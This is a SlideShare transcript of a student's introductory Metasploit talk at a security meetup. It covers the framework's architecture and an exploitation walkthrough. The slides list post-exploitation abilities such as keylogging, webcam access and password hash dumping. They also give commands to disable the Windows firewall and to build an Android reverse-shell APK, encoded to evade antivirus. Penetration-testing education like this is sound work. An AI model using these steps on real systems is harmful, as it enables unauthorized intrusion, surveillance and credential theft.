Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.



Published on

Null Hyd December Meet

Published in: Education
  • Be the first to comment


  1. 1. INTRODUCTION TO METASPLOIT #METASPLOIT G.Manideep, @mani0x00 -God of Framework’s
  2. 2. #whoami <?php $var = “@mani0x00”; If ($var == script kiddie){ Echo ‘security flows in blood ’; } Else if ($var == white hat){ Echo ‘security flows in blood’; } Else{ Echo ‘security flows in blood’; } ?> G.Manideep, 3rd year ,E.C.E @mani0x00
  3. 3. #Creato r  Developer of Metasploit Framework.  Chief Researcher at Boston.  Leading provider of security data and analytics software and cloud Solutions.
  4. 4. #History  In Oct 2003 ‘DEFCON’ Metasploit 1.0 was released with 11 exploits by H.D.Moore. Firstly, it was completely coded in Perl and later completely re-coded in Ruby. Acquired by Rapid7 in 2009 under some terms and conditions. Remains open source 
  5. 5. #Getting started #vulnerability A Vulnerability is a weakness of a system, which allows the attacker to Exploit the system. VULNERABIL ITY
  6. 6. #Getting started #Exploit An Exploit is an attack on a system, especially one that takes advantage of a particular Vulnerability of the system using Payloads.
  7. 7. #Getting started #Payload A Payload is a piece of code that executes in the vulnerable system after exploitation of the system.
  8. 8. Tools Libraries REX MSF core MSF basePlugins Modules Auxiliary Payloads Exploits Encoders Nops #Architecture Interfaces Console CLI WEB Armitage
  9. 9. #libraries rex msf:: core msf :: base
  10. 10. #Modules Exploit’s Payload’s Auxiliary’s Encoders Nops
  11. 11. #Auxiliary’s Typically, an Exploit without Payload is called Auxiliary. Used for scanning, fuzzing, and some automated tasks. Makes use of mixins. To run type in Run.
  12. 12. #Encoders To evade anti-viruses encoders are used. Payload’s are encrypted. E.g. • Shikata_ga_nai • Nonaplha • Bloxor
  13. 13. #Nops Mainly used to keep the size of the payload consistent. Having 8 nops.
  14. 14. #Interfaces  #msfcli  #msfconsole  #msfweb  #Armitage(GUI)
  15. 15. #Armitage (Gui) Developed by Raphel Mudge
  16. 16. #msfconsole Which is a interactive console. starting msfconsole
  17. 17. #msfconsole Here our journey begins   msf >
  18. 18. #let’s attack
  19. 19. #Port scanning which is for information gathering. Nmap is used for port scanning. Auxiliary’s also can be used. As information gathering is important in pen testing, let’s do a traditional scanning .
  20. 20. #Port scanning Using Auxiliary’s:
  21. 21. #Port scanning Using Nmap:
  22. 22. #Exploitation Mostly an attacker send’s a combination of Exploit and Payload. In msfconsole there are some simple commands that makes our work pretty easy  some of them are (core commands): Search Use Set
  23. 23. #Exploitation Using Exploit: Just type in use <path of suggested exploit’s> prefer the exploit which has a good ranking.
  24. 24. #Exploitation Setting Parameters: Just type show options and find the parameters to be filled. Then set the parameter by typing ‘set <parameter> <value>’.
  25. 25. #Exploitation Similar to Exploit’s search, search for appropriate Payload. Then Set using ‘set PAYLOAD’ and fill the payload parameters. Then Just type in “Exploit”.
  26. 26. #some successful exploits ms03_026dcom ms08_067_netapi (ever green :D ) ms11_050_mshtml ms10_042_helpctr_xss_cmd_exec ms10_046_shortcut_icon_dllloader dreamftp_format distcc_exec (for linux)
  27. 27. #Maintaining access By executing a script with some arguments as shown below -run persistence –S(admin priv) –i(time int) – p(rport) –r(lhost)
  28. 28. #Maintaining access By listening on the specified port using multi- handler exploit
  29. 29. #Post Exploitation Using this meterpreter we can perform different tasks by getting the privileges of the victim . Can grab a screen shot’s, keylogging by loading and much more with • Espia • Incognito • Pivot • Sniffer • Priv
  30. 30. #Post Exploitation Can also perform using modules. Let’s take multiple screen shots in a certain intervals.
  31. 31. #Post Exploitation Margate's to another process which has admin privileges and then completes the task.
  32. 32. #Post Exploitation What else we can do in post exploitation? Let’s see some of them, -Keylogging -Screen shots -view live screen -access webcam -take control of keyboard and mouse -del user -pivort -vm detection and many more..
  33. 33. #Privilege Escalation what can you get from the system privileges which are used to be protected is called Privilege escalation. Some of them are migrating the process, stealing the tokens to get the desired privileges.  Let’s take a look on some of them .
  34. 34. #Privilege Escalation Can migrate to pid’s which has admin privileges.
  35. 35. #Privilege Escalation By loading Incognito, We can steal( impersonate ) the tokens to get privileges.
  36. 36. #Privilege Escalation To use type in impersonate_token<token>
  37. 37. #Privilege Escalation #HashDump: Dumps all the user’s usernames and passwords
  38. 38. #What else we can do? Even can sniff the packets of the victim remotely Evading Firewall’s Let’s take a look
  39. 39. #Bypassing Firewall
  40. 40. #Bypassing FirewallAfter getting a meterpreter , get access to shell and type > netsh firewall show opmode
  41. 41. #Bypassing Firewall Now type >netsh firewall set opmode mode= DISABLE
  42. 42. #Attacking Linux Using distcc_exec
  43. 43. #Attacking Android Using msfpayload msfpayload android/meterpreter/reverse_tcp LHOST=<loc-ip> LPORT=<any> R> /(desired path for saving)<file>.apk Install that apk file into device if there is any anti-virus encode them with encoders
  44. 44. #Attacking Android Listen on mentioned port using multi-handler exploit
  45. 45. #Thank you! - @mani0x0